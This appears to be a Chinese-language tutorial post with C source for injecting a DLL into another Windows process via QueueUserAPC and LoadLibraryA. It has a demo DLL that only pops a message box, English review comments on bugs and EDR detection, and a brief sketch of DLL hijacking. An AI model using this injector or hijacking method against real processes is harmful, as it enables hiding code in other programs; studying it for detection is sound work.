主要是以下五步
//注入器
//1.要注入到进程中首先要拿到进程ID
//2.获取到LoadLibrary地址
//3.在目标程序的体内开辟一块内存,用来写入dll地址
//4.遍历线程-随便选一个目标进程的线程获取句柄
//5.插入APC,把LoadLibrary作为APC的回调参数,然后把目标进程的dll地址作为参数
#include<stdio.h>
#include<stdlib.h>
#include<Windows.h>
#include<TlHelp32.h>
typedef HMODULE (WINAPI *myLoadLibraryA)(
__in LPCSTR lpLibFileName
);
/*
 * Demo of the classic "APC injection" technique this post walks through:
 * copy a DLL path into process dwPid, then queue a user-mode APC on one of
 * its threads with LoadLibraryA as the APC routine and the copied path as
 * the argument.
 *
 * dwPid   - target process id
 * DllPath - NUL-terminated path of the DLL to load (strlen+1 bytes are copied)
 *
 * Returns TRUE if QueueUserAPC succeeded on the first thread found that
 * belongs to dwPid, FALSE if that call failed.  If Thread32First fails or
 * no thread of dwPid is in the snapshot, control falls off the end of the
 * function without a return statement, so the caller reads an indeterminate
 * value (undefined behaviour for a non-void function whose result is used).
 *
 * NOTE(review): none of OpenProcess, VirtualAllocEx, WriteProcessMemory,
 * CreateToolhelp32Snapshot or OpenThread has its result checked, and none of
 * hProcess, hThreadSnap, hThread is ever closed (no CloseHandle in the block).
 *
 * Detection perspective: the observable footprint is the cross-process chain
 * OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx -> WriteProcessMemory ->
 * OpenThread -> QueueUserAPC against a thread the caller does not own; EDR
 * telemetry on those calls is what flags this technique.
 */
BOOL APC_IN(DWORD dwPid, char *DllPath) {
SIZE_T stWriteRetSize = 0; /* bytes actually written by WriteProcessMemory; never inspected */
/* Resolve LoadLibraryA in *this* process.  NOTE(review): the pointer is then
 * used in the target, which only works if kernel32 is mapped at the same base
 * in both processes - confirm that assumption for the intended targets. */
myLoadLibraryA myLoadFunc = (myLoadLibraryA)GetProcAddress(GetModuleHandleA("kernel32.dll"),"LoadLibraryA");// get the address of LoadLibraryA
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid); /* unchecked: NULL on failure */
/* One page of RW memory in the target to hold the DLL path string. */
PVOID pAddress = VirtualAllocEx(hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
/* Copies the path including its terminator; DllPath longer than 0x1000-1 is not guarded against. */
WriteProcessMemory(hProcess, pAddress, DllPath, (strlen(DllPath) + 1), &stWriteRetSize);
/* Thread snapshot.  NOTE: a TH32CS_SNAPTHREAD snapshot is system-wide, which is
 * why the loop below filters on th32OwnerProcessID. */
HANDLE hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, dwPid);
THREADENTRY32 te32 = { sizeof(THREADENTRY32) }; /* first member is dwSize, required by Thread32First */
BOOL ret = Thread32First(hThreadSnap, &te32);
if (ret)
{
do
{
if (dwPid == te32.th32OwnerProcessID) {
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID);// open the thread
/* The APC routine becomes LoadLibraryA(pAddress) inside the target.
 * NOTE(review): a user-mode APC runs only once that thread becomes
 * alertable, so success here means "queued", not "DLL loaded". */
BOOL bApc = QueueUserAPC((PAPCFUNC)myLoadFunc, hThread, (ULONG_PTR)pAddress);
/* Both branches return immediately: only the first matching thread is tried. */
if (bApc) {
return TRUE;
}
else {
return FALSE;
}
}
} while (Thread32Next(hThreadSnap, &te32));
}
/* No return here: reached when Thread32First fails or no thread matched. */
}
/*
 * Console driver: reads a PID from stdin, runs APC_IN with a hard-coded DLL
 * path, reports the result in a message box and waits for a key press.
 *
 * NOTE(review): dwProcessId is a DWORD (unsigned long) but is read with "%d"
 * - the matching conversion would be "%lu" - and scanf's return value is not
 * checked, so a non-numeric input leaves dwProcessId at 0.  "falg" is
 * presumably a typo for "flag".
 */
int main() {
DWORD dwProcessId = 0;
printf("PID:");
scanf("%d", &dwProcessId);
/* DLL path is specific to the author's machine; APC_IN's return value is
 * indeterminate when no thread of the PID was found (see APC_IN). */
BOOL falg = APC_IN(dwProcessId,"C:\\Users\\rkvir\\Desktop\\APC_dll.dll");
/* Wide-string literals with MessageBox imply a UNICODE build (MessageBoxW) - assumed, not shown here. */
if (falg) {
MessageBox(NULL, L"success", L"success", MB_OK);
}
else {
MessageBox(NULL, L"failed", L"failed", MB_OK);
}
system("pause"); /* keeps the console open; spawns cmd.exe */
return 0;
}
随便编写一个程序
然后在编写一个dll程序,让他弹个框
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include “stdafx.h”
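/*
 * Entry point of the demo DLL: pops a message box when the DLL is mapped
 * into a process and ignores the thread/detach notifications.
 *
 * hModule            - handle of this DLL module (unused)
 * ul_reason_for_call - DLL_PROCESS_ATTACH, DLL_THREAD_ATTACH,
 *                      DLL_THREAD_DETACH or DLL_PROCESS_DETACH
 * lpReserved         - unused
 *
 * Returns TRUE for every notification so the load always succeeds.
 */
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH: /* runs inside whichever process loaded the DLL */
MessageBox(NULL, L"hello my baby!", L"hello my baby!", MB_OK);
break; /* explicit: the remaining cases are intentionally no-ops */
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
default:
break;
}
return TRUE;
}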
注入成功。
DLL劫持
大致分为本地劫持跟远程劫持
分别看exe调用的dll文件里是否用的是LoadLibrary*,还是LoadLibraryEx*
本地劫持就可以直接自己写个dll改名为想要的dll即可,远程的需要看返回地址,然后自己构造相应的函数